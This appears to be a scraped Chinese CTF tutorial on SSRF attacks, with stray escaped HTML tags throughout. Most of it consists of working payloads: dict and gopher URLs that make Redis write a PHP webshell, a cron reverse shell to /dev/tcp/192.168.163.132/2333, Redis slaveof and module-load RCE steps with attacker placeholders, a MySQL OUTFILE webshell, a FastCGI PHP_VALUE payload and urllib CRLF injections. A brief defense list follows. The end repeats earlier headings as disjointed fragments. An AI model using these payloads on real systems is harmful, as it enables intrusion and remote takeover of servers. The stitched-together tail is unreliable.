SSRF在CTF中的高级利用技术<\/h1>

1. SSRF基础与Redis利用<\/h2>

1.1 SSRF简介<\/h3>
SSRF(Server-Side Request Forgery)是一种攻击者能够从服务器端发起任意请求的安全漏洞。在CTF比赛中，SSRF常被用于攻击内网服务，特别是Redis、MySQL等数据库服务。<\/p>

1.2 Redis未授权访问利用<\/h3>

Redis未授权访问是SSRF攻击的常见目标，主要利用方式包括：<\/p>

反弹shell<\/li>
webshell写入<\/li>

SSH key上传<\/li> <\/ul>

1.3 使用dict协议攻击Redis<\/h3>

dict协议可以用于与Redis服务交互，典型攻击流程：<\/p>

信息收集<\/strong>：<\/p>

dict:\/\/127.0.0.1:6379\/info
<\/code><\/pre>
<\/li>

写入webshell<\/strong>：<\/p>
flushall
config set dir \/var\/www\/html
config set dbfilename shell.php
set webshell "<?php phpinfo();?>"
save
<\/code><\/pre>
<\/li>

十六进制编码绕过特殊字符过滤<\/strong>：

当直接使用?<\/code>等特殊字符被过滤时，可使用十六进制编码：<\/p>
dict:\/\/127.0.0.1:6379\/set:webshell:"\x3C\x3fphp\x20phpinfo\x28\x29\x3b\x3f\x3e"
<\/code><\/pre>
<\/li>

写入定时任务反弹shell<\/strong>：<\/p>
set 1 '\n\n*\/1 * * * * root \/bin\/bash -i >& \/dev\/tcp\/192.168.163.132\/2333 0>&1\n\n'
<\/code><\/pre>
十六进制编码版本：<\/p>
dict:\/\/127.0.0.1:6379\/set:webshell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20\/bin\/bash\x20\x2di\x20\x3e\x26\x20\/dev\/tcp\/127.0.0.1\/2333\x200\x3e\x261\n\n"
<\/code><\/pre>
<\/li>
<\/ol>
1.4 端口探测<\/h3>
dict协议也可用于端口存活探测：<\/p>
dict:\/\/127.0.0.1:6379\/
<\/code><\/pre>
2. Gopher协议高级利用<\/h2>
2.1 Gopher协议基础<\/h3>
Gopher协议比dict协议更强大，可以构造任意TCP流量。<\/p>
2.2 攻击Redis流程<\/h3>


抓取正常Redis流量<\/strong>：<\/p>
tcpdump -i lo port 6379 -w redis.pcap
<\/code><\/pre>
<\/li>

提取并编码流量<\/strong>：

将抓取的十六进制流量转换为URL编码格式，如：<\/p>
%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a
<\/code><\/pre>
<\/li>

Web环境下双编码<\/strong>：

在Web环境中需要对payload进行双重URL编码。<\/p>
<\/li>
<\/ol>
2.3 主从复制攻击<\/h3>
当直接写入webshell受限时，可使用Redis主从复制：<\/p>


设置主从关系<\/strong>：<\/p>
slaveof <attacker_ip> <attacker_port>
<\/code><\/pre>
<\/li>

主机执行命令<\/strong>：<\/p>
config set dir \/var\/www\/html
config set dbfilename shell.php
set webshell "<?php phpinfo();?>"
save
<\/code><\/pre>
<\/li>

抓取流量并编码<\/strong>：

将主从复制过程中的TCP流量抓取并编码为Gopher payload。<\/p>
<\/li>
<\/ol>
2.4 主从复制RCE<\/h3>
在Redis 4.x\/5.x中可实现RCE：<\/p>


设置备份路径和文件名<\/strong>：<\/p>
config set dir .\/
config set dbfilename exp.so
<\/code><\/pre>
<\/li>

设置主服务器<\/strong>：<\/p>
slaveof <attacker_ip> <attacker_port>
<\/code><\/pre>
<\/li>

加载恶意模块<\/strong>：<\/p>
module load .\/exp.so
<\/code><\/pre>
<\/li>

执行命令<\/strong>：<\/p>
system.exec 'whoami';
system.rev <attacker_ip> <attacker_port>
<\/code><\/pre>
<\/li>
<\/ol>
3. MySQL攻击技术<\/h2>
3.1 无密码认证攻击<\/h3>
当MySQL无密码或使用--skip-grant-tables<\/code>时：<\/p>


抓取登录流量<\/strong>：<\/p>
tcpdump -i lo -s 0 port 3306 -w mysql.pcap
<\/code><\/pre>
<\/li>

关键点<\/strong>：<\/p>

登录流量中的00 00 00 03<\/code><\/li>
认证成功标志01 00 00 00 01<\/code><\/li>
<\/ul>
<\/li>

写入webshell<\/strong>：<\/p>
select '<?php phpinfo();?>' INTO OUTFILE '\/var\/www\/html\/shell.php';
<\/code><\/pre>
<\/li>
<\/ol>
3.2 工具辅助<\/h3>
可使用工具快速生成MySQL攻击payload：<\/p>

Gopherus<\/li>
SSRFmap<\/li>
<\/ul>
4. FastCGI攻击技术<\/h2>
4.1 攻击原理<\/h3>
利用PHP-FPM的php:\/\/input<\/code>和.htaccess<\/code>\/user.ini<\/code>的auto_prepend_file<\/code>\/auto_append_file<\/code>实现代码执行。<\/p>
4.2 攻击条件<\/h3>

PHP-FPM版本 >= 5.3.3<\/li>
知道服务器上一个PHP文件的绝对路径<\/li>
<\/ul>
4.3 攻击步骤<\/h3>


构造payload<\/strong>：<\/p>
{
    'GATEWAY_INTERFACE': 'FastCGI\/1.0',
    'REQUEST_METHOD': 'POST',
    'SCRIPT_FILENAME': '\/var\/www\/html\/index.php',
    'SCRIPT_NAME': '\/index.php',
    'QUERY_STRING': '',
    'REQUEST_URI': '\/index.php',
    'DOCUMENT_ROOT': '\/var\/www\/html',
    'SERVER_SOFTWARE': 'php\/fcgiclient',
    'REMOTE_ADDR': '127.0.0.1',
    'REMOTE_PORT': '9985',
    'SERVER_ADDR': '127.0.0.1',
    'SERVER_PORT': '80',
    'SERVER_NAME': 'localhost',
    'SERVER_PROTOCOL': 'HTTP\/1.1',
    'CONTENT_TYPE': 'application\/text',
    'CONTENT_LENGTH': '48',
    'PHP_VALUE': 'auto_prepend_file = php:\/\/input',
    'PHP_ADMIN_VALUE': 'allow_url_include = On'
}
<\/code><\/pre>
<\/li>

利用工具<\/strong>：<\/p>

Gopherus<\/li>
P神的exp<\/li>
<\/ul>
<\/li>
<\/ol>
5. Python urllib头注入SSRF<\/h2>
5.1 漏洞版本<\/h3>

Python 2.7.10之前<\/li>
Python 3.4.4之前<\/li>
CVE-2019-9740 (Python 3.7.x和2.7.16之前)<\/li>
CVE-2019-9947<\/li>
<\/ul>
5.2 注入方式<\/h3>


IP地址和端口号分隔符处注入<\/strong>：<\/p>
http:\/\/192.168.10.137:7777?a=1 HTTP\/1.1\r\nX-injected: header\r\nTEST: 123:8080\/test\/?test=a
<\/code><\/pre>
<\/li>

端口号后面注入<\/strong>：<\/p>
http:\/\/192.168.10.137:7777\/?q=HTTP\/1.1\r\nHeader: Value\r\nHeader2: \r\n
<\/code><\/pre>
<\/li>
<\/ol>
5.3 实战利用<\/h3>
url=http:\/\/foo@127.0.0.1:6379%20@www.sina.com\/
<\/code><\/pre>
或更复杂的CRLF注入：<\/p>
url=http:\/\/foo@127.0.0.1:5000%20@www.sina.com\/%3Furl=https:\/\/baidu.com
<\/code><\/pre>
6. 防御措施<\/h2>


输入验证<\/strong>：<\/p>

严格校验URL协议、端口和主机名<\/li>
使用白名单限制可访问的域名和IP<\/li>
<\/ul>
<\/li>

服务加固<\/strong>：<\/p>

Redis设置密码认证<\/li>
MySQL避免使用--skip-grant-tables<\/code><\/li>
限制PHP-FPM的执行权限<\/li>
<\/ul>
<\/li>

网络隔离<\/strong>：<\/p>

将敏感服务置于内网<\/li>
设置防火墙规则限制出站连接<\/li>
<\/ul>
<\/li>

软件更新<\/strong>：<\/p>

及时更新Python等存在SSRF相关漏洞的软件<\/li>
<\/ul>
<\/li>
<\/ol>
通过掌握这些SSRF高级利用技术，可以在CTF比赛中有效攻击内网服务，同时也能更好地理解如何防御此类攻击。<\/p>

SSRF在CTF中的高级利用技术<\/h1>

1. SSRF基础与Redis利用<\/h2>

1.1 SSRF简介<\/h3> SSRF(Server-Side Request Forgery)是一种攻击者能够从服务器端发起任意请求的安全漏洞。在CTF比赛中，SSRF常被用于攻击内网服务，特别是Redis、MySQL等数据库服务。<\/p>

2. Gopher协议高级利用<\/h2>

2.1 Gopher协议基础<\/h3> Gopher协议比dict协议更强大，可以构造任意TCP流量。<\/p>

3. MySQL攻击技术<\/h2>

4. FastCGI攻击技术<\/h2>

4.1 攻击原理<\/h3> 利用PHP-FPM的php:\/\/input<\/code>和.htaccess<\/code>\/user.ini<\/code>的auto_prepend_file<\/code>\/auto_append_file<\/code>实现代码执行。<\/p>

5. Python urllib头注入SSRF<\/h2>

1.1 SSRF简介<\/h3>
SSRF(Server-Side Request Forgery)是一种攻击者能够从服务器端发起任意请求的安全漏洞。在CTF比赛中，SSRF常被用于攻击内网服务，特别是Redis、MySQL等数据库服务。<\/p>

2.1 Gopher协议基础<\/h3>
Gopher协议比dict协议更强大，可以构造任意TCP流量。<\/p>

4.1 攻击原理<\/h3>
利用PHP-FPM的`php:\/\/input<\/code>和.htaccess<\/code>\/user.ini<\/code>的auto_prepend_file<\/code>\/auto_append_file<\/code>实现代码执行。<\/p>`